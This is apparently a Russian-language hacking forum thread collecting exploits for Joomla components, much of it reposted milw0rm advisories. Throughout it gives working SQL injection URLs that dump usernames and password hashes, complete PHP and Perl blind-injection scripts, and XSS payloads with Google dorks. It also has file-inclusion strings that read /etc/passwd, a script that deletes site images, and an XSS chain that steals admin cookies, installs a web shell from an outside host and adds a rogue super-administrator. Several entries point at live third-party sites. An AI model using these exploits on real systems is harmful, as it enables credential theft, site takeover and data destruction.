Joomla Компонент: Fantasytournament (com_fantasytournament) Version: 2009.1.5 Уязвимость: SQL-injection Code: http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users-- Code: http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users-- Code: http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users-- Author:"Adrian Gray" Компонент: Camelcitydb2 (com_camelcitydb2) Version: 2.2 Уязвимость: SQL-injection Code: http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15 Author:"Noel Hunter"
Joomla Компонент: com_Eventing 1.6.x Уязвимость: SQL Injection Exploit PHP: <?php ini_set("max_execution_time",0); print_r(' ############################################################################## # # Joomla com_Eventing Blind SQL Injection Exploit # # === Cyb3R-1st === # [email protected] # == Writing by Stack - thx m8 - == # # usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1" # ############################################################################## '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?> # milw0rm.com [2009-01-15] Компонент: RD-Autos 1.5.2 Уязвимость: SQL Injection Vulnerability [~] Exploit Code: /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54 [~] Example Code: /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
Joomla Компонент: Gigcal 1.x Уязвимость: SQL Injection Vulnerability Exploit : Code: http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* Компонент: com_pccookbook Уязвимость: Blind SQL Injection Exploit HTML: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " #########################################################################\n"; print " # \n"; print " # Joomla com_pccookbook Blind sql injection exploit \n"; print " # \n"; print " # Cyb3R-1sT \n"; print " # cyb3r-1st[at]hotmail.com \n"; print " # \n"; print " # Usage:perl file.pl host path <options> \n"; print " # example: perl file.pl www.host.com /joomla/ -a 7 \n"; print " # \n"; print " # Options: -a id \n"; print " # \n"; print " #########################################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "a=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"a"}) { $aid = $options{"a"}; } syswrite(STDOUT, "[~] Password: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Ingredients"; if($content =~ /$regexp/) { return 1; } else { return 0; } } Компонент: com_news Уязвимость: SQL Injection Vulnerability Exploit: Code: http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users-- Компонент: com_waticketsystem Уязвимость: Blind SQL Injection Exploit PHP: <?php ini_set("max_execution_time",0); print_r(' ############################################################################## # # Joomla com_waticketsystem Blind SQL Injection Exploit # # === Cyb3R-1st === # [email protected] # == inject0r5 t3am == # # usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1" # ############################################################################## '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>
Joomla Component beamospetition 1.0.12 SQL Injection / XSS _______ http://www.milw0rm.com/exploits/7847 ::::: Joomla com_pcchess (game_id) Blind SQL Injection Exploit _______ http://www.milw0rm.com/exploits/7846 ::::: Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability _______ http://www.milw0rm.com/exploits/7841 ::::: Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit _______ http://www.milw0rm.com/exploits/7840
Уязвимости компонентов Joomla\Mambo XSS Joomla Component Reservation Manager Version: 1.7 (last update on Oct 3, 2008) Type: Commercial (99$) Vulnerable parametre: year Exploit: "><script>alert(document.cookie)</script> Dork: "inurl:com_resman" Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&year=2010"><script>alert(document.cookie)</script> Joomla Component Car Manager Version: 2.1 (last update on Jan 6, 2009) Type: Commercial (129$) Vulnerable parametre: msg Exploit: "><script>alert(document.cookie)</script> Dork: "inurl:com_carman" Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(document.cookie)</script> Joomla Component Time Slot Registration Version: 1.0.5 (last update on Mar 26, 2008) Type: Non-Commercial Vulnerable parametre: entity Exploit: "><script>alert(document.cookie)</script> Dork: "inurl:com_time_slot_registration" Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=viewEventsList&entity="><script>alert(document.cookie)</script> Joomla Component Hire Manager Version: 1.2 (last update on Oct 3, 2008) Type: Commercial (99$) Vulnerable parametre: msg Exploit: "><script>alert(document.cookie)</script> Dork: "inurl:com_hireman" Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(document.cookie)</script> Joomla Component hwdCourses beta Version: 1.1.1 (last update on Apr 29, 2008) Type: Non-Commercial Vulnerable parametre: dif, type Exploit: "><script>alert(document.cookie)</script> Dork: "inurl:com_hwdcourses" Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Classic"><script>alert(document.cookie)</script>
Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability exploit: Code: http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL Code: union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* источник:http://milw0rm.com/ -------------------------------------------------------------- The End!
может было.. затрете, если да. нашел такой сайтец _http://www.joomlascan.com - сканировал 1.0.13 с модулем com_datsogallery и нифига не нашло - может кому больше повезет еще одна тулза - _http://sourceforge.net/projects/joomscan/ вроде живой проект.
Компонент com_xevidmegafx Sql-inj уязвимость в параметре id: 19 столбцов по идее можно попробывать +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- но не нашел выводимые поля, поэтому перебирал как Blind SQL
Code: ############################################ # Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability # ############################################ - dork: inurl:"index.php?option=com_djiceshoutbox" The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like: "><script>alert('XaDoS')</script> or '">><script>alert('XSS By XaDoS')</script> the XSS become permanent in every page of site! not critical damage but it's not funny.. [+] D3M0: http://www.djiceatwork.com contact me at xados @ hotmail . it www.securitycode.it # milw0rm.com [2009-03-10]
Joomla Component com_bookjoomlas Code: [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. ************************************************* [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users ************************************************* [+] Fix No fix. ************************************************* # milw0rm.com [2009-04-06]
Code: ############################################################################# # # # Joomla Component MailTo SQL Injection Vulnerability # # # ############################################################################# ######################################## [~] Vulnerability found by: H!tm@N [~] Contact: khghitman[at]gmail[dot]com [~] Site: www.khg-crew.ws [~] Greetz: boom3rang, KHG, chs, redc00de [~] -=[Kosova Hackers Group]=--=[KHG-Crew]=- ######################################## [~] ScriptName: "Joomla" [~] Component: "MailTo (com_mailto)" [~] Date: "April 2006" ######################################## [~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1 [~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1 ######################################## [~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1 ######################################## [~] Proud 2 be Albanian [~] Proud 2 be Muslim [~] R.I.P redc00de ######################################## ----------------------------------------------------------------+ Code: ############################################################################# # # # Joomla Component MaianMusic SQL Injection Vulnerability # # # ############################################################################# ######################################## [~] Vulnerability found by: H!tm@N [~] Contact: khghitman[at]gmail[dot]com [~] Site: www.khg-crew.ws [~] Greetz: boom3rang, KHG, chs, redc00de [~] -=[Kosova Hackers Group]=--=[KHG-Crew]=- ######################################## [~] ScriptName: "Joomla" [~] Component: "MaianMusic (com_maianmusic)" [~] Version: "1.2.1" [~] Date: "09-26-2008" [~] Author: "Arelowo Alao & David Bennett" [~] Author E-mail: "[email protected]" [~] Author URL: "www.aretimes.com" ######################################## [~] Exploit: /index.php?option=com_maianmusic§ion=category&category=[SQL]&Itemid=70 [~] Example: /index.php?option=com_maianmusic§ion=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70 ######################################## [~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic§ion=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en ######################################## [~] Proud 2 be Albanian [~] Proud 2 be Muslim [~] R.I.P redc00de ######################################## ----------------------------------------------------------------+ Code: ############################################################################# # # # Joomla Component Cmimarketplace Directory Traversal Vulnerability # # # ############################################################################# ######################################## [~] Vulnerability found by: H!tm@N [~] Contact: khghitman[at]gmail[dot]com [~] Site: www.khg-crew.ws [~] Greetz: boom3rang, KHG, chs, redc00de [~] -=[Kosova Hackers Group]=--=[KHG-Crew]=- ######################################## [~] ScriptName: "Joomla" [~] Component: "Cmimarketplace (com_cmimarketplace)" [~] Date: "August 2008" [~] Author: "Magnetic Merchandising Inc." [~] E-mail: "[email protected]" [~] Author URL: "www.ijobid.com" ######################################## [~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1 [~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1 ######################################## [~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1 ######################################## [~] Proud 2 be Albanian [~] Proud 2 be Muslim [~] R.I.P redc00de ######################################## © milw0rm.com [2009-04-08]
Cегодня пришлось дело иметь дело с Джумлой 1.5, начал искать сплоенты, нашел на оффе http://forum.joomla.org/viewtopic.php?f=300&t=371705 Вот написал небольшой експлоит: Code: <?php // Удаление произвольных изображений в каталоге Joomla // by [underwater] $WEB_VULNERABLE = 'http://www.site.com/'; if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){ echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>'; ob_get_contents(); sleep(5); } if($archive= obt_archive($WEB_VULNERABLE.'images/')){ foreach($archivos as $valor){ if(eregi('/', $valor[(count($valor)-1)])){ $tipo = 'folder'; }else{ $tipo = 'file'; } echo '<iframe src="'. $WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo .'.delete&tmpl=component&folder=&rm[]='.urlencode($valor) .'" width="1" height="1" frameborder="0"></iframe>'; } } function obt_archive($url){ $buffer = explode(']"> <a href="', file_get_contents($url)); foreach($buffer as $item=> $valor){ if($item != '0'){ $temp = explode('"', $valor); $retorn[count($retorno)] = $temp[0]; } } return $retorn; } ?> Потом нашел ксс Code: http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search Не знаю была ли найдена ксс до меня или нет, я нигде не встречал, самое вкусное что через нее можно залить шелл, вот сплоит: Code: <?php error_reporting(0); $EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/'; $EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Путь к шеллу $EXPL['XSS'] = '<script '. 'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>'; if($_GET['act'] == 'js'){ die(' var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function base64_encode(input){ var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; do{ chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if(isNaN(chr2)){ enc3 = enc4 = 64; }else if(isNaN(chr3)){ enc4 = 64; } output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4); }while(i < input.length); return output; } window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie); '); }elseif($_GET['act'] == 'gall'){ if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>'); $buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies); $buscar = expl('hidden" name="', $buffer); foreach($buscar as $encont){ $encont = expl('"', $encont); $encont = $encont[0]; if(strlen($encont) == 32){ $hash = $encont; break; } } $buffer = http_post( $EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies, $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&' ); if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){ / / Операция выполнена успешно! шелл /modules/mod_artimesk/mod_artimesk.php header('UnderWhat?!'); $explot = true; }else{ $explot = false; } if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){ if($explot){ fwrite($archiv_handle, 'Шелл успешно загружен'. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A"); header('location: https://forum.antichat.ru'); }else{ fwrite($archiv_handle, .$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A"); } fclose($archiv_handle); } exit($explot); } // Выполнение произвольного кода яваскрипт $pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search'; if(http_get($pedir, 'null[]=token')){ header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search'); }else{ die('hola :-s'); } function http_post($url, $cookies, $postdata){ $timeout = 100; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); curl_setopt($ch, CURLOPT_COOKIE, $cookies); $conten = curl_exec($ch); $error = curl_error($ch); curl_close($ch); if($conten) return $conten; else return $error; } function http_get($url, $cookies){ $timeout = 100; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIE, $cookies); $conten = curl_exec($ch); $error = curl_error($ch); curl_close($ch); if($conten) return $conten; else return $error; } ?>
Joomla Component rsmonials Remote Cross Site Scxripting Exploit Code: /* RSMonials XSS Exploit http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component Google Dork: allinurl:option=com_rsmonials Anything entered into the form gets rendered as HTML, so you can add tags as long as they don't include quotes (magic quotes eats them, if it's on). This component ships with settings that prevent posting by default, but the administrator page for the testimonials renders your script in its entirety. Proof of Concept 1: Remote file upload Visit http://target.com/index.php?option=com_rsmonials and post a comment. At the end of your glowing comment about how awesome the site is, attach this: <script src=http://badsite.com/evil.js></script> Now, when your admin goes to the com_rsmonials "Testimonials" page, your script will execute. In this example, a hidden iframe loads up the install page and installs a 'custom' module. */ var exploited = false; var iframe = document.createElement( 'iframe' ); var reg = new RegExp( 'administrator' ); if( reg.test( location.href ) ) { iframe.src = 'index.php?option=com_installer'; iframe.setStyle( 'display', 'none' ); document.body.appendChild( iframe ); iframe.addEvent( 'load', exploit ); } function exploit( e ) { if( exploited != true ) { var doc = e.target.contentDocument; if( !doc ) return; var inp = doc.getElementById( 'install_url' ); inp.value = 'http://badsite.com/exploit.zip'; var b = inp.parentNode.getElementsByTagName( 'input' )[1]; b.onclick(); exploited = true; } } /* Proof of Concept 2: New Super Administrator Here's a drop-in replacement for the 'exploit' function above: function exploit( e ) { if( exploited != true ) { var newForm = false; var doc = e.target.contentDocument; if( !doc ) return; var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return; var i = 0; for( ; i<nb.length; i++ ) { if( nb[i].parentNode.id == 'toolbar-new' ) { nb[i].onclick(); } else if( nb[i].parentNode.id == 'toolbar-save' ) { doc.getElementById( 'name' ).value = 'hacked'; doc.getElementById( 'username' ).value = 'hacked'; doc.getElementById( 'email' ).value = '[email protected]'; doc.getElementById( 'password' ).value = 'password'; doc.getElementById( 'password2' ).value = 'password'; var g = doc.getElementById( 'gid' ); g.selectedIndex = g.options.length - 1; nb[i].onclick(); exploited = true; } } } } If the admin is a Super Admin, then you could be too... just remember to watch your freemail account for Joomla's account notification! */ /* jdc 2009 */ # milw0rm.com [2009-04-22]
com_dictionary /components/com_dictionary/dictionary.php PHP: if($wordid)//выбрано слово, надо показать описание { echo "<h3>Описание</h3>"; $database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid); $result = $database->query(); $row = mysql_fetch_object($result); index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users
Прочитал в каком-то испанском блоге про следующую уязвимость: http://127.0.0.1/joomla/index.php?option=com_user&task=register В имени пользователя можно вставить HTML-код, есть небольшой фильтр, который обходится кавычками ;P Например, что-то типа: Code: number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x=" Дальше дело техники - однопиксельная пикча делает перенаправление на евил скрипт. Находится данное чудо тут: /administrator/components/com_users/views/user/tmpl/form.php Прикольно то что джумло-кодеры проепали точто также еще 10 файлов)
Clickheat [fr Joomla] Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1 Vuln file: install.clickheat.php Viln Code: Code: require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php'); Exploit: Code: http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00 Vuln file: _main.php Viln Code: Code: require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' ); Exploit: Code: http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00 Vuln file: main.php Viln Code: Code: require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' ); Exploit: Code: http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00 Vuln file: Cache.php Viln Code: Code: require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php'); Exploit: Code: http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00 Vuln file: Clickheat_Heatmap.php Viln Code: Code: require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php'); Exploit: Code: http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00 Vuln file: GlobalVariables.php Viln Code: Code: require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php'); Exploit: Code: http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00 Нда вобщем-то...)
Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities ArtForms 2.1b7 remote file includes From Turkey iskorpitx (O bir dünya markası Asla Taklit Edilemez) // swfmovie.php - swf output and config /* output captcha image */ /* output captcha mp3 */ ---------------------------------------------------------------------------------- Code: [path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell Code: [path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell Code: [path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell ----------------------------------------------------------------------------------- by iskorpitx [email protected] # milw0rm.com [2009-05-15]
Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection ================================================================================== Joomla Component com_juser (id) SQL injection Vulnerability ================================================================================== ################################################### [+] Author : Chip D3 Bi0s [+] Author Name : Russell... [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua [+] Group : LatinHackTeam [+] Vulnerability : SQL injection [+] Google Dork : imagine [+] Email : chipdebios[alt+64]gmail.com ################################################### Code: http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code] ------ SQL code: Code: +and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- ----- Code: http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <creationDate>25.05.2007</creationDate> <author>Joomlaequipment</author> <copyright>Joomlaequipment"©2007</copyright> <license>Comercial</license> <authorEmail>[email protected]</authorEmail> <authorUrl>http://joomlaequipment.com</authorUrl> <version>2.0.4</version> <description>Registration Manager</description> # milw0rm.com [2009-06-01]
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= Joomla com_vehiclemanager 1.0 Remote File Include Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= Found: xoron contact: [email protected] (only e-mail) =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= Exploit: -> ... Code: /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell? =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= Thanx: str0ke, VoLkan =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= # milw0rm.com [2009-06-09]
